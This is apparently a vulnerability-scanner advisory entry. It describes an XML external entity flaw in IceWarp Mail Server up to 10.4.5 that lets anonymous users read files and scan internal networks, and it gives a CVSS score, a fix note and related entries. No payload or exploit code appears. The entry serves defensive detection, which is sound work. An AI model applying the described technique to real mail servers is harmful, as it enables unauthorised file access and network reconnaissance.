Summary
The remote IceWarp Web Mail is prone to an information-disclosure Vulnerability.
Impact
Attackers can exploit these issues to gain access to potentially sensitive information.
Impact Level: System/Application
Solution
Vendor updates are available.
Insight
The used XML parser is resolving external XML entities which allows attackers to read files and send requests to systems on the internal network (e.g port scanning). The risk of this vulnerability is highly increased by the fact that it can be exploited by anonymous users without existing user accounts.
Affected
IceWarp Mail Server <=10.4.5
Detection
Send a special crafted HTTP POST request and check the response.
References
Severity
Classification
-
CVSS Base Score: 9.0
AV:N/AC:L/Au:N/C:P/I:C/A:P
Related Vulnerabilities
- Apache Struts2 Redirection and Security Bypass Vulnerabilities
- Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability
- aflog Cookie-Based Authentication Bypass Vulnerability
- Atutor AChecker Multiple SQL Injection and XSS Vulnerabilities
- Adobe ColdFusion Multiple Vulnerabilities-01 May-2014